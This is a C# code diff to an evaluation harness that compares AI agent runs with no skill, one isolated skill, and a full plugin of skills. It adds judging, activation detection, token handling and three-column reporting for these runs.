- AgentRunner.RunAgent(new RunOptions(scenario, skill, skill.EvalPath, config.Model, config.Verbose, runLog)));
+ // 1. Baseline: no plugin, no skills — vanilla agent
+ AgentRunner.RunAgent(new RunOptions(scenario, null, skill.EvalPath, config.Model, config.Verbose,
+ PluginRoot: null, Log: runLog)),
+ // 2. Skilled-isolated: single skill only (current behavior)
+ AgentRunner.RunAgent(new RunOptions(scenario, skill, skill.EvalPath, config.Model, config.Verbose,
+ PluginRoot: null, Log: runLog)),
+ // 3. Skilled-plugin: entire plugin loaded via --plugin-dir
+ AgentRunner.RunAgent(new RunOptions(scenario, skill, skill.EvalPath, config.Model, config.Verbose,
+ PluginRoot: pluginRoot, Log: runLog)));
var baselineMetrics = agentTasks[0];
- var withSkillMetrics = agentTasks[1];
+ var isolatedMetrics = agentTasks[1];
+ var pluginMetrics = agentTasks[2];
- // Evaluate assertions
+ // Evaluate assertions on all three runs
if (scenario.Assertions is { Count: > 0 })
{
baselineMetrics.AssertionResults = await AssertionEvaluator.EvaluateAssertions(scenario.Assertions, baselineMetrics.AgentOutput, baselineMetrics.WorkDir);
- withSkillMetrics.AssertionResults = await AssertionEvaluator.EvaluateAssertions(scenario.Assertions, withSkillMetrics.AgentOutput, withSkillMetrics.WorkDir);
+ isolatedMetrics.AssertionResults = await AssertionEvaluator.EvaluateAssertions(scenario.Assertions, isolatedMetrics.AgentOutput, isolatedMetrics.WorkDir);
+ pluginMetrics.AssertionResults = await AssertionEvaluator.EvaluateAssertions(scenario.Assertions, pluginMetrics.AgentOutput, pluginMetrics.WorkDir);
}
- // Evaluate constraints
+ // Evaluate constraints on all three runs
var baselineConstraints = AssertionEvaluator.EvaluateConstraints(scenario, baselineMetrics);
- var withSkillConstraints = AssertionEvaluator.EvaluateConstraints(scenario, withSkillMetrics);
+ var isolatedConstraints = AssertionEvaluator.EvaluateConstraints(scenario, isolatedMetrics);
+ var pluginConstraints = AssertionEvaluator.EvaluateConstraints(scenario, pluginMetrics);
baselineMetrics.AssertionResults = [..baselineMetrics.AssertionResults, ..baselineConstraints];
- withSkillMetrics.AssertionResults = [..withSkillMetrics.AssertionResults, ..withSkillConstraints];
+ isolatedMetrics.AssertionResults = [..isolatedMetrics.AssertionResults, ..isolatedConstraints];
+ pluginMetrics.AssertionResults = [..pluginMetrics.AssertionResults, ..pluginConstraints];
- // Task completion
+ // Task completion for all three
if (scenario.Assertions is { Count: > 0 } || baselineConstraints.Count > 0)
{
baselineMetrics.TaskCompleted = baselineMetrics.AssertionResults.All(a => a.Passed);
- withSkillMetrics.TaskCompleted = withSkillMetrics.AssertionResults.All(a => a.Passed);
+ isolatedMetrics.TaskCompleted = isolatedMetrics.AssertionResults.All(a => a.Passed);
+ pluginMetrics.TaskCompleted = pluginMetrics.AssertionResults.All(a => a.Passed);
}
else
{
baselineMetrics.TaskCompleted = baselineMetrics.ErrorCount == 0;
- withSkillMetrics.TaskCompleted = withSkillMetrics.ErrorCount == 0;
+ isolatedMetrics.TaskCompleted = isolatedMetrics.ErrorCount == 0;
+ pluginMetrics.TaskCompleted = pluginMetrics.ErrorCount == 0;
}
- // Judge — failures are non-fatal so a single timeout doesn't kill the whole evaluation.
- // Await each judge independently so a failure in one doesn't discard the other's result.
+ // Judge all three runs independently (failures are non-fatal)
var judgeOpts = new JudgeOptions(config.JudgeModel, config.Verbose, config.JudgeTimeout, baselineMetrics.WorkDir, skill.Path);
var baselineJudgeTask = Services.Judge.JudgeRun(scenario, baselineMetrics, judgeOpts, runLog);
- var withSkillJudgeTask = Services.Judge.JudgeRun(
- scenario, withSkillMetrics, judgeOpts with { WorkDir = withSkillMetrics.WorkDir }, runLog);
-
- JudgeResult baselineJudge;
- try
- {
- baselineJudge = await baselineJudgeTask;
- }
- catch (Exception error)
- {
- var shortMsg = SanitizeErrorMessage(error.Message);
- runLog($"\x1b[33m⚠️ Judge (baseline) failed, using fallback scores: {shortMsg}\x1b[0m");
- baselineJudge = new JudgeResult([], 3, $"Judge failed: {shortMsg}");
- }
+ var isolatedJudgeTask = Services.Judge.JudgeRun(
+ scenario, isolatedMetrics, judgeOpts with { WorkDir = isolatedMetrics.WorkDir }, runLog);
+ var pluginJudgeTask = Services.Judge.JudgeRun(
+ scenario, pluginMetrics, judgeOpts with { WorkDir = pluginMetrics.WorkDir }, runLog);
- JudgeResult withSkillJudge;
- try
- {
- withSkillJudge = await withSkillJudgeTask;
- }
- catch (Exception error)
- {
- var shortMsg = SanitizeErrorMessage(error.Message);
- runLog($"\x1b[33m⚠️ Judge (with skill) failed, using fallback scores: {shortMsg}\x1b[0m");
- withSkillJudge = new JudgeResult([], 3, $"Judge failed: {shortMsg}");
- }
+ var baselineJudge = await SafeJudge(baselineJudgeTask, "baseline", runLog);
+ var isolatedJudge = await SafeJudge(isolatedJudgeTask, "isolated", runLog);
+ var pluginJudge = await SafeJudge(pluginJudgeTask, "plugin", runLog);
- var baseline = new RunResult(baselineMetrics, baselineJudge);
- var withSkillResult = new RunResult(withSkillMetrics, withSkillJudge);
+ var baselineResult = new RunResult(baselineMetrics, baselineJudge);
+ var isolatedResult = new RunResult(isolatedMetrics, isolatedJudge);
+ var pluginResult = new RunResult(pluginMetrics, pluginJudge);
- // Pairwise judging
+ // Pairwise judging — compare baseline vs worse-scoring skilled run
+ // Track which run the pairwise result corresponds to.
PairwiseJudgeResult? pairwise = null;
+ bool pairwiseFromPlugin = false;
if (usePairwise)
{
+ pairwiseFromPlugin = pluginJudge.OverallScore < isolatedJudge.OverallScore;
+ var worseSkilled = pairwiseFromPlugin
+ ? pluginMetrics : isolatedMetrics;
try
{
pairwise = await Services.PairwiseJudge.Judge(
- scenario, baselineMetrics, withSkillMetrics,
- new PairwiseJudgeOptions(config.JudgeModel, config.Verbose, config.JudgeTimeout, baselineMetrics.WorkDir, skill.Path, withSkillMetrics.WorkDir),
+ scenario, baselineMetrics, worseSkilled,
+ new PairwiseJudgeOptions(config.JudgeModel, config.Verbose, config.JudgeTimeout, baselineMetrics.WorkDir, skill.Path, worseSkilled.WorkDir),
runLog);
}
catch (Exception error)
@@ -685,25 +777,40 @@ private static async Task ExecuteRun(
}
}
- // Skill activation
- var skillActivation = MetricsCollector.ExtractSkillActivation(withSkillMetrics.Events, baselineMetrics.ToolCallBreakdown);
+ // Skill activation — check both skilled runs independently
+ // Pass the target skill name so that in plugin runs only the skill under
+ // test counts towards activation (prevents sibling-skill false positives).
+ var isolatedActivation = MetricsCollector.ExtractSkillActivation(
+ isolatedMetrics.Events, baselineMetrics.ToolCallBreakdown, skill.Name);
+ var pluginActivation = MetricsCollector.ExtractSkillActivation(
+ pluginMetrics.Events, baselineMetrics.ToolCallBreakdown, skill.Name);
+
+ runLog(isolatedActivation.Activated
+ ? $"🔌 Skill activated (isolated): skills={string.Join(", ", isolatedActivation.DetectedSkills)}"
+ : "⚠️ Skill NOT activated (isolated)");
+ runLog(pluginActivation.Activated
+ ? $"🔌 Skill activated (plugin): skills={string.Join(", ", pluginActivation.DetectedSkills)}"
+ : "⚠️ Skill NOT activated (plugin)");
+
+ if (config.Verbose)
+ runLog("✓ complete");
+
+ return new RunExecutionResult(baselineResult, isolatedResult, pluginResult, pairwise,
+ pairwiseFromPlugin, isolatedActivation, pluginActivation);
+ }
- if (skillActivation.Activated)
+ private static async Task SafeJudge(Task task, string label, Action runLog)
+ {
+ try
{
- var parts = new List();
- if (skillActivation.DetectedSkills.Count > 0) parts.Add($"skills: {string.Join(", ", skillActivation.DetectedSkills)}");
- if (skillActivation.ExtraTools.Count > 0) parts.Add($"extra tools: {string.Join(", ", skillActivation.ExtraTools)}");
- runLog($"🔌 Skill activated ({string.Join("; ", parts)})");
+ return await task;
}
- else
+ catch (Exception error)
{
- runLog("\x1b[33m⚠️ Skill was NOT activated during this run\x1b[0m");
+ var shortMsg = SanitizeErrorMessage(error.Message);
+ runLog($"\x1b[33m⚠️ Judge ({label}) failed, using fallback scores: {shortMsg}\x1b[0m");
+ return new JudgeResult([], 3, $"Judge failed: {shortMsg}");
}
-
- if (config.Verbose)
- runLog("✓ complete");
-
- return new RunExecutionResult(baseline, withSkillResult, pairwise, skillActivation);
}
// --- Noise-only evaluation: skill-only vs all-skills (no pure-agent baseline) ---
@@ -807,11 +914,11 @@ private static async Task ExecuteNoiseTest(
{
// Run with target skill only
var skillOnlyMetrics = await AgentRunner.RunAgent(new RunOptions(
- scenario, targetSkill, targetSkill.EvalPath, config.Model, config.Verbose, scenarioLog));
+ scenario, targetSkill, targetSkill.EvalPath, config.Model, config.Verbose, Log: scenarioLog));
// Run with all skills loaded
var allSkillsMetrics = await AgentRunner.RunAgent(new RunOptions(
- scenario, targetSkill, targetSkill.EvalPath, config.Model, config.Verbose, scenarioLog, AdditionalSkills: otherSkills));
+ scenario, targetSkill, targetSkill.EvalPath, config.Model, config.Verbose, Log: scenarioLog, AdditionalSkills: otherSkills));
// Evaluate assertions on both
if (scenario.Assertions is { Count: > 0 })
diff --git a/eng/skill-validator/src/Models/Models.cs b/eng/skill-validator/src/Models/Models.cs
index 2374b7f60d..83e0223793 100644
--- a/eng/skill-validator/src/Models/Models.cs
+++ b/eng/skill-validator/src/Models/Models.cs
@@ -230,15 +230,29 @@ public sealed class ScenarioComparison
{
public required string ScenarioName { get; init; }
public required RunResult Baseline { get; init; }
- public required RunResult WithSkill { get; init; }
+ public RunResult SkilledIsolated { get; init; } = null!;
+ public RunResult? SkilledPlugin { get; init; }
public required double ImprovementScore { get; init; }
+ public double IsolatedImprovementScore { get; init; }
+ public double PluginImprovementScore { get; init; }
public required MetricBreakdown Breakdown { get; init; }
+ public MetricBreakdown? IsolatedBreakdown { get; init; }
+ public MetricBreakdown? PluginBreakdown { get; init; }
public PairwiseJudgeResult? PairwiseResult { get; init; }
public IReadOnlyList? PerRunScores { get; set; }
- public SkillActivationInfo? SkillActivation { get; set; }
+ public SkillActivationInfo? SkillActivationIsolated { get; set; }
+ public SkillActivationInfo? SkillActivationPlugin { get; set; }
public bool TimedOut { get; set; }
/// When false, non-activation is expected (negative test) and should not flag the verdict.
public bool ExpectActivation { get; set; } = true;
+
+ // Backward-compatible aliases for JSON deserialization of older results files.
+ // These must be settable (init) so System.Text.Json can populate them during
+ // deserialization of legacy JSON that uses the old property names.
+ [JsonPropertyName("withSkill")]
+ public RunResult WithSkill { get => SkilledIsolated; init => SkilledIsolated = value; }
+ [JsonPropertyName("skillActivation")]
+ public SkillActivationInfo? SkillActivation { get => SkillActivationIsolated; init => SkillActivationIsolated = value; }
}
// --- Verdict ---
@@ -253,6 +267,8 @@ public sealed class SkillVerdict
public double? NormalizedGain { get; init; }
public ConfidenceInterval? ConfidenceInterval { get; init; }
public bool? IsSignificant { get; init; }
+ public double? IsolatedScore { get; set; }
+ public double? PluginScore { get; set; }
public required string Reason { get; set; }
/// Categorizes why the verdict failed, if it did.
public string? FailureKind { get; set; }
diff --git a/eng/skill-validator/src/Services/AgentRunner.cs b/eng/skill-validator/src/Services/AgentRunner.cs
index aef38084d3..17c8d10f2c 100644
--- a/eng/skill-validator/src/Services/AgentRunner.cs
+++ b/eng/skill-validator/src/Services/AgentRunner.cs
@@ -14,46 +14,66 @@ public sealed record RunOptions(
string? EvalPath,
string Model,
bool Verbose,
+ string? PluginRoot = null,
Action? Log = null,
IReadOnlyList? AdditionalSkills = null);
public static class AgentRunner
{
- private static CopilotClient? _sharedClient;
+ private static readonly ConcurrentDictionary _pluginClients = new(StringComparer.OrdinalIgnoreCase);
private static readonly SemaphoreSlim _clientLock = new(1, 1);
private static readonly ConcurrentBag _workDirs = [];
+ private static string? _capturedGitHubToken;
+ private static bool _tokenCaptured;
///
- /// Returns the shared , creating it on first call.
- /// Must be called before executing any untrusted workloads (eval scenarios,
- /// setup commands).
+ /// Capture GITHUB_TOKEN once at startup so multiple clients can share it
+ /// and the env var is cleared from child processes.
///
- public static async Task GetSharedClient(bool verbose)
+ public static void CaptureGitHubToken()
{
- if (_sharedClient is not null) return _sharedClient;
+ if (_tokenCaptured) return;
+ _capturedGitHubToken = Environment.GetEnvironmentVariable("GITHUB_TOKEN");
+ if (!string.IsNullOrEmpty(_capturedGitHubToken))
+ Environment.SetEnvironmentVariable("GITHUB_TOKEN", null);
+ _tokenCaptured = true;
+ }
+
+ ///
+ /// Returns a CopilotClient configured for the given plugin.
+ /// The client is created once per plugin root and reused.
+ /// Note: --plugin-dir is NOT honored by the SDK, so all clients share
+ /// the same configuration. Plugin skills are loaded manually via
+ /// SkillDirectories in BuildSessionConfig instead.
+ ///
+ public static async Task GetPluginClient(
+ string? pluginRoot, bool verbose)
+ {
+ var key = pluginRoot ?? "";
+
+ if (_pluginClients.TryGetValue(key, out var existing))
+ return existing;
await _clientLock.WaitAsync();
try
{
- if (_sharedClient is not null) return _sharedClient;
+ if (_pluginClients.TryGetValue(key, out existing))
+ return existing;
+
+ CaptureGitHubToken();
var options = new CopilotClientOptions
{
LogLevel = verbose ? "info" : "none",
};
- var githubToken = Environment.GetEnvironmentVariable("GITHUB_TOKEN");
- if (!string.IsNullOrEmpty(githubToken))
- {
- options.GitHubToken = githubToken;
- // Clear the token from the environment so child processes
- // (e.g. LLM-generated code, eval shell commands) cannot read it.
- Environment.SetEnvironmentVariable("GITHUB_TOKEN", null);
- }
+ if (!string.IsNullOrEmpty(_capturedGitHubToken))
+ options.GitHubToken = _capturedGitHubToken;
- _sharedClient = new CopilotClient(options);
- await _sharedClient.StartAsync();
- return _sharedClient;
+ var client = new CopilotClient(options);
+ await client.StartAsync();
+ _pluginClients[key] = client;
+ return client;
}
finally
{
@@ -61,15 +81,27 @@ public static async Task GetSharedClient(bool verbose)
}
}
- public static async Task StopSharedClient()
+ ///
+ /// Backward-compatible alias — returns the no-plugin client.
+ /// Used by judge sessions that don't need plugin loading.
+ ///
+ public static Task GetSharedClient(bool verbose)
+ => GetPluginClient(null, verbose);
+
+ /// Stop all plugin clients (including the no-plugin client).
+ public static async Task StopAllClients()
{
- if (_sharedClient is not null)
+ foreach (var (_, client) in _pluginClients)
{
- await _sharedClient.StopAsync();
- _sharedClient = null;
+ try { await client.StopAsync(); }
+ catch (Exception ex) { Console.Error.WriteLine($"Warning: failed to stop Copilot client: {ex.Message}"); }
}
+ _pluginClients.Clear();
}
+ /// Backward-compatible alias.
+ public static Task StopSharedClient() => StopAllClients();
+
/// Remove all temporary working directories created during runs.
public static Task CleanupWorkDirs()
{
@@ -82,7 +114,7 @@ public static Task CleanupWorkDirs()
}));
}
- public static bool CheckPermission(PermissionRequest request, string workDir, string? skillPath, Action? log, string? runLabel = null, IReadOnlyList? additionalAllowedDirs = null)
+ public static bool CheckPermission(PermissionRequest request, string workDir, string? skillPath, Action? log, string? runLabel = null, string? pluginRoot = null, IReadOnlyList? additionalAllowedDirs = null)
{
string? reqPath = null;
if (request.ExtensionData is { } data)
@@ -125,6 +157,14 @@ public static bool CheckPermission(PermissionRequest request, string workDir, st
allowedDirs.Add(skillsPathAbsolute);
}
+ if (pluginRoot is not null)
+ {
+ string pluginRootAbsolute = Path.GetFullPath(pluginRoot);
+ if (!Path.EndsInDirectorySeparator(pluginRootAbsolute))
+ pluginRootAbsolute = pluginRootAbsolute + Path.DirectorySeparatorChar;
+
+ allowedDirs.Add(pluginRootAbsolute);
+ }
if (additionalAllowedDirs is not null)
{
@@ -161,6 +201,7 @@ public static bool CheckPermission(PermissionRequest request, string workDir, st
internal static SessionConfig BuildSessionConfig(
SkillInfo? skill,
+ string? pluginRoot,
string model,
string workDir,
IReadOnlyDictionary? mcpServers = null,
@@ -179,12 +220,11 @@ internal static SessionConfig BuildSessionConfig(
if (verbose)
log?.Invoke($" 📂 Config dir: {configDir} ({(skill is not null ? "skilled" : "baseline")})");
- // Build skill directories list: primary skill + any additional skills.
+ // Build additional noise skill directories when noise testing is active.
// For additional skills we stage a temp directory with copies of each
// skill's SKILL.md so the SDK discovers exactly those skills — not
// every sibling that happens to share the same parent directory.
- var skillDirs = new List();
- if (skillPath is not null) skillDirs.Add(skillPath);
+ var noiseDirs = new List();
if (additionalSkills is { Count: > 0 })
{
var stageDir = Path.Combine(Path.GetTempPath(), $"sv-noise-{Guid.NewGuid():N}");
@@ -202,10 +242,11 @@ internal static SessionConfig BuildSessionConfig(
File.Copy(skillMdPath, Path.Combine(stagedSkillDir, "SKILL.md"));
}
- skillDirs.Add(stageDir);
+ noiseDirs.Add(stageDir);
}
// Convert MCPServerDef records to the SDK's Dictionary shape
+ // Security hardening: validate commands, sanitize args/env, drop custom cwd.
Dictionary? sdkMcp = null;
if (mcpServers is { Count: > 0 })
{
@@ -247,19 +288,41 @@ internal static SessionConfig BuildSessionConfig(
if (sdkMcp.Count == 0) sdkMcp = null;
}
+ // Three run types:
+ // 1. Baseline (skill == null, pluginRoot == null): no skills, no MCP.
+ // 2. Skilled-isolated (skill != null, pluginRoot == null): single skill via SkillDirectories.
+ // 3. Skilled-plugin (skill != null, pluginRoot != null): entire plugin loaded manually
+ // via SkillDirectories (--plugin-dir is NOT honored by SDK).
+ //
+ // For skilled-plugin, we enumerate all skill directories from plugin.json
+ // so that all sibling skills are loaded, matching production behavior.
+ string[] skillDirs;
+ if (pluginRoot is not null)
+ {
+ skillDirs = ResolvePluginSkillDirectories(pluginRoot);
+ }
+ else if (skill is not null)
+ {
+ skillDirs = [skillPath!];
+ }
+ else
+ {
+ skillDirs = [];
+ }
+
return new SessionConfig
{
Model = model,
Streaming = true,
WorkingDirectory = workDir,
- SkillDirectories = skillDirs,
+ SkillDirectories = [..skillDirs, ..noiseDirs],
ConfigDir = configDir,
McpServers = sdkMcp,
InfiniteSessions = new InfiniteSessionConfig { Enabled = false },
OnPermissionRequest = (request, _) =>
{
var runLabel = skill is not null ? "skilled" : "baseline";
- var result = CheckPermission(request, workDir, skillPath, verbose ? log : null, runLabel);
+ var result = CheckPermission(request, workDir, skillPath, verbose ? log : null, runLabel, pluginRoot);
return Task.FromResult(new PermissionRequestResult
{
Kind = result ? PermissionRequestResultKind.Approved : PermissionRequestResultKind.DeniedByRules,
@@ -268,11 +331,44 @@ internal static SessionConfig BuildSessionConfig(
};
}
+ ///
+ /// Resolves the skill directories for a plugin by reading its plugin.json
+ /// and returning the resolved skills path. The SDK scans this directory
+ /// for subdirectories containing SKILL.md files.
+ ///
+ internal static string[] ResolvePluginSkillDirectories(string pluginRoot)
+ {
+ var pluginJsonPath = Path.Combine(pluginRoot, "plugin.json");
+ PluginInfo? pluginInfo;
+ try
+ {
+ pluginInfo = PluginValidator.ParsePluginJson(pluginJsonPath);
+ }
+ catch (JsonException)
+ {
+ // Malformed plugin.json — return empty so the session is created
+ // without extra skill directories; validation surfaces the real error.
+ return [];
+ }
+ if (pluginInfo?.SkillsPath is null) return [];
+
+ if (!PluginValidator.TryGetSafeSubdirectory(
+ pluginRoot, pluginInfo.SkillsPath, out var skillsDir, out _))
+ return [];
+
+ if (!Directory.Exists(skillsDir!)) return [];
+
+ return [skillsDir!];
+ }
+
public static async Task RunAgent(RunOptions options)
{
+ var runType = options.Skill is null ? "baseline"
+ : options.PluginRoot is not null ? "skilled-plugin"
+ : "skilled-isolated";
return await RetryHelper.ExecuteWithRetry(
async ct => await RunAgentCore(options, ct),
- label: $"RunAgent({options.Scenario.Name}, {(options.Skill is not null ? "skilled" : "baseline")})",
+ label: $"RunAgent({options.Scenario.Name}, {runType})",
maxRetries: 2,
baseDelayMs: 5_000,
totalTimeoutMs: (options.Scenario.Timeout + 60) * 1000);
@@ -294,10 +390,12 @@ private static async Task RunAgentCore(RunOptions options, Cancellat
try
{
+ // All runs use the shared client — plugin skills are loaded manually
+ // via SkillDirectories (--plugin-dir is not honored by SDK).
var client = await GetSharedClient(options.Verbose);
await using var session = await client.CreateSessionAsync(
- BuildSessionConfig(options.Skill, options.Model, workDir, options.Skill?.McpServers, options.AdditionalSkills, options.Log, options.Verbose));
+ BuildSessionConfig(options.Skill, options.PluginRoot, options.Model, workDir, options.Skill?.McpServers, options.AdditionalSkills, options.Log, options.Verbose));
var done = new TaskCompletionSource();
var effectiveTimeout = options.Scenario.Timeout;
diff --git a/eng/skill-validator/src/Services/Comparator.cs b/eng/skill-validator/src/Services/Comparator.cs
index fa1aaff775..70f6cb8fd1 100644
--- a/eng/skill-validator/src/Services/Comparator.cs
+++ b/eng/skill-validator/src/Services/Comparator.cs
@@ -54,9 +54,12 @@ public static ScenarioComparison CompareScenario(
{
ScenarioName = scenarioName,
Baseline = baseline,
- WithSkill = withSkill,
+ SkilledIsolated = withSkill,
+ SkilledPlugin = null,
ImprovementScore = improvementScore,
+ IsolatedImprovementScore = improvementScore,
Breakdown = breakdown,
+ IsolatedBreakdown = breakdown,
PairwiseResult = pairwiseResult,
};
}
@@ -95,7 +98,8 @@ public static SkillVerdict ComputeVerdict(
if (requireCompletion)
{
bool regressed = comparisons.Any(c =>
- c.Baseline.Metrics.TaskCompleted && !c.WithSkill.Metrics.TaskCompleted);
+ c.Baseline.Metrics.TaskCompleted &&
+ (!c.SkilledIsolated.Metrics.TaskCompleted || (c.SkilledPlugin is not null && !c.SkilledPlugin.Metrics.TaskCompleted)));
if (regressed)
{
return new SkillVerdict
@@ -133,6 +137,8 @@ public static SkillVerdict ComputeVerdict(
NormalizedGain = normalizedGain,
ConfidenceInterval = ci,
IsSignificant = significant,
+ IsolatedScore = comparisons.Average(c => c.IsolatedImprovementScore),
+ PluginScore = comparisons.Average(c => c.PluginImprovementScore),
Reason = reason,
FailureKind = passed ? null : "threshold",
};
@@ -170,7 +176,15 @@ private static double ComputeNormalizedGain(IReadOnlyList co
foreach (var c in comparisons)
{
double pre = (c.Baseline.JudgeResult.OverallScore - 1) / 4.0;
- double post = (c.WithSkill.JudgeResult.OverallScore - 1) / 4.0;
+ // Select the effective run based on the worse (lower) improvement score,
+ // then use that run's overall score so this aligns with the effective
+ // comparison used for pass/fail and reporting.
+ double effectiveScore;
+ if (c.SkilledPlugin is not null && c.PluginImprovementScore < c.IsolatedImprovementScore)
+ effectiveScore = c.SkilledPlugin.JudgeResult.OverallScore;
+ else
+ effectiveScore = c.SkilledIsolated.JudgeResult.OverallScore;
+ double post = (effectiveScore - 1) / 4.0;
if (pre >= 1)
totalGain += post >= pre ? 0 : post - pre;
diff --git a/eng/skill-validator/src/Services/MetricsCollector.cs b/eng/skill-validator/src/Services/MetricsCollector.cs
index 3ebc0eb0e8..b0c6927806 100644
--- a/eng/skill-validator/src/Services/MetricsCollector.cs
+++ b/eng/skill-validator/src/Services/MetricsCollector.cs
@@ -7,10 +7,14 @@ public static class MetricsCollector
{
///
/// Analyse events from a "with-skill" run to determine whether the skill was activated.
+ /// When is set, only counts as "Activated" if the
+ /// target skill was specifically detected — prevents false positives in plugin runs
+ /// where sibling skills may fire instead of the skill under test.
///
public static SkillActivationInfo ExtractSkillActivation(
IReadOnlyList skilledEvents,
- Dictionary baselineToolBreakdown)
+ Dictionary baselineToolBreakdown,
+ string? targetSkillName = null)
{
var detectedSkills = new List();
int skillEventCount = 0;
@@ -44,8 +48,18 @@ public static SkillActivationInfo ExtractSkillActivation(
.Where(tool => !baselineToolBreakdown.ContainsKey(tool))
.ToList();
+ // When targetSkillName is set, activation is determined solely by whether
+ // the target skill was specifically detected (case-insensitive). ExtraTools
+ // and sibling skill names are still populated for diagnostic purposes but
+ // do NOT contribute to the Activated flag — we control the SDK and it always
+ // emits SkillInvokedEvent when a skill is loaded.
+ bool activated = targetSkillName is null
+ ? skillEventCount > 0 || extraTools.Count > 0
+ : detectedSkills.Any(s =>
+ s.Equals(targetSkillName, StringComparison.OrdinalIgnoreCase));
+
return new SkillActivationInfo(
- Activated: skillEventCount > 0 || extraTools.Count > 0,
+ Activated: activated,
DetectedSkills: detectedSkills,
ExtraTools: extraTools,
SkillEventCount: skillEventCount);
diff --git a/eng/skill-validator/src/Services/PairwiseJudge.cs b/eng/skill-validator/src/Services/PairwiseJudge.cs
index 246822032b..4913412702 100644
--- a/eng/skill-validator/src/Services/PairwiseJudge.cs
+++ b/eng/skill-validator/src/Services/PairwiseJudge.cs
@@ -87,7 +87,7 @@ private static async Task JudgeCall(
OnPermissionRequest = (request, _) =>
{
var extraDirs = options.SkilledWorkDir is not null ? new[] { options.SkilledWorkDir } : null;
- var result = AgentRunner.CheckPermission(request, options.WorkDir, options.SkillPath, options.Verbose ? log : null, "pairwise-judge", extraDirs);
+ var result = AgentRunner.CheckPermission(request, options.WorkDir, options.SkillPath, options.Verbose ? log : null, "pairwise-judge", additionalAllowedDirs: extraDirs);
return Task.FromResult(new PermissionRequestResult
{
Kind = result ? PermissionRequestResultKind.Approved : PermissionRequestResultKind.DeniedByRules,
diff --git a/eng/skill-validator/src/Services/Reporter.cs b/eng/skill-validator/src/Services/Reporter.cs
index 47e40a5119..f8ab8f95db 100644
--- a/eng/skill-validator/src/Services/Reporter.cs
+++ b/eng/skill-validator/src/Services/Reporter.cs
@@ -170,7 +170,7 @@ private static void ReportConsole(IReadOnlyList verdicts, bool ver
Console.WriteLine($"{summaryColor}{summaryText}\x1b[0m");
bool anyTimeout = verdicts.Any(v => v.Scenarios.Any(s =>
- s.Baseline.Metrics.TimedOut || s.WithSkill.Metrics.TimedOut));
+ s.Baseline.Metrics.TimedOut || s.SkilledIsolated.Metrics.TimedOut || (s.SkilledPlugin?.Metrics.TimedOut == true)));
if (anyTimeout)
{
Console.WriteLine();
@@ -186,70 +186,105 @@ private static void ReportScenarioDetail(ScenarioComparison scenario, bool verbo
Console.WriteLine($" {icon} {scenario.ScenarioName} {FormatScore(scenario.ImprovementScore)}");
var b = scenario.Baseline.Metrics;
- var s = scenario.WithSkill.Metrics;
- var bd = scenario.Breakdown;
+ var s = scenario.SkilledIsolated.Metrics;
+ var p = scenario.SkilledPlugin?.Metrics;
double bRubric = AvgRubricScore(scenario.Baseline.JudgeResult.RubricScores);
- double sRubric = AvgRubricScore(scenario.WithSkill.JudgeResult.RubricScores);
+ double sRubric = AvgRubricScore(scenario.SkilledIsolated.JudgeResult.RubricScores);
+ double? pRubric = scenario.SkilledPlugin is { } sp ? AvgRubricScore(sp.JudgeResult.RubricScores) : null;
- var metrics = new (string Label, double Value, string Absolute, bool LowerIsBetter)[]
+ // Build 3-column metric rows: baseline: X isolated: Y (delta%) plugin: Z (delta%)
+ var metricRows = new (string Label, string Baseline, string Isolated, string? Plugin)[]
{
- ("Tokens", bd.TokenReduction, $"{b.TokenEstimate} → {s.TokenEstimate}", true),
- ("Tool calls", bd.ToolCallReduction, $"{b.ToolCallCount} → {s.ToolCallCount}", true),
- ("Task completion", bd.TaskCompletionImprovement, $"{FmtBool(b.TaskCompleted)} → {FmtBool(s.TaskCompleted)}", false),
- ("Time", bd.TimeReduction, $"{FmtMs(b.WallTimeMs)}{(b.TimedOut ? " ⏰" : "")} → {FmtMs(s.WallTimeMs)}{(s.TimedOut ? " ⏰" : "")}", true),
- ("Quality (rubric)", bd.QualityImprovement, $"{bRubric:F1}/5 → {sRubric:F1}/5", false),
- ("Quality (overall)", bd.OverallJudgmentImprovement, $"{scenario.Baseline.JudgeResult.OverallScore:F1}/5 → {scenario.WithSkill.JudgeResult.OverallScore:F1}/5", false),
- ("Errors", bd.ErrorReduction, $"{b.ErrorCount} → {s.ErrorCount}", true),
+ ("Tokens",
+ $"{b.TokenEstimate}",
+ FormatMetricWithDelta(s.TokenEstimate, b.TokenEstimate, true),
+ p is not null ? FormatMetricWithDelta(p.TokenEstimate, b.TokenEstimate, true) : null),
+ ("Tool calls",
+ $"{b.ToolCallCount}",
+ FormatMetricWithDelta(s.ToolCallCount, b.ToolCallCount, true),
+ p is not null ? FormatMetricWithDelta(p.ToolCallCount, b.ToolCallCount, true) : null),
+ ("Task completion",
+ FmtBool(b.TaskCompleted),
+ FmtBool(s.TaskCompleted),
+ p is not null ? FmtBool(p.TaskCompleted) : null),
+ ("Time",
+ $"{FmtMs(b.WallTimeMs)}{(b.TimedOut ? " ⏰" : "")}",
+ $"{FmtMs(s.WallTimeMs)}{(s.TimedOut ? " ⏰" : "")}{FormatPctDelta(s.WallTimeMs, b.WallTimeMs, true)}",
+ p is not null ? $"{FmtMs(p.WallTimeMs)}{(p.TimedOut ? " ⏰" : "")}{FormatPctDelta(p.WallTimeMs, b.WallTimeMs, true)}" : null),
+ ("Quality (rubric)",
+ $"{bRubric:F1}/5",
+ $"{sRubric:F1}/5{FormatPctDelta(sRubric, bRubric, false)}",
+ pRubric is not null ? $"{pRubric:F1}/5{FormatPctDelta(pRubric.Value, bRubric, false)}" : null),
+ ("Quality (overall)",
+ $"{scenario.Baseline.JudgeResult.OverallScore:F1}/5",
+ $"{scenario.SkilledIsolated.JudgeResult.OverallScore:F1}/5{FormatPctDelta(scenario.SkilledIsolated.JudgeResult.OverallScore, scenario.Baseline.JudgeResult.OverallScore, false)}",
+ scenario.SkilledPlugin is not null ? $"{scenario.SkilledPlugin.JudgeResult.OverallScore:F1}/5{FormatPctDelta(scenario.SkilledPlugin.JudgeResult.OverallScore, scenario.Baseline.JudgeResult.OverallScore, false)}" : null),
+ ("Errors",
+ $"{b.ErrorCount}",
+ FormatMetricWithDelta(s.ErrorCount, b.ErrorCount, true),
+ p is not null ? FormatMetricWithDelta(p.ErrorCount, b.ErrorCount, true) : null),
};
+ bool hasPlugin = scenario.SkilledPlugin is not null;
+
// Show timeout warnings prominently before the metrics table
- if (b.TimedOut || s.TimedOut)
+ if (b.TimedOut || s.TimedOut || p?.TimedOut == true)
{
var parts = new List();
if (b.TimedOut) parts.Add("baseline");
- if (s.TimedOut) parts.Add("with-skill");
+ if (s.TimedOut) parts.Add("isolated");
+ if (p?.TimedOut == true) parts.Add("plugin");
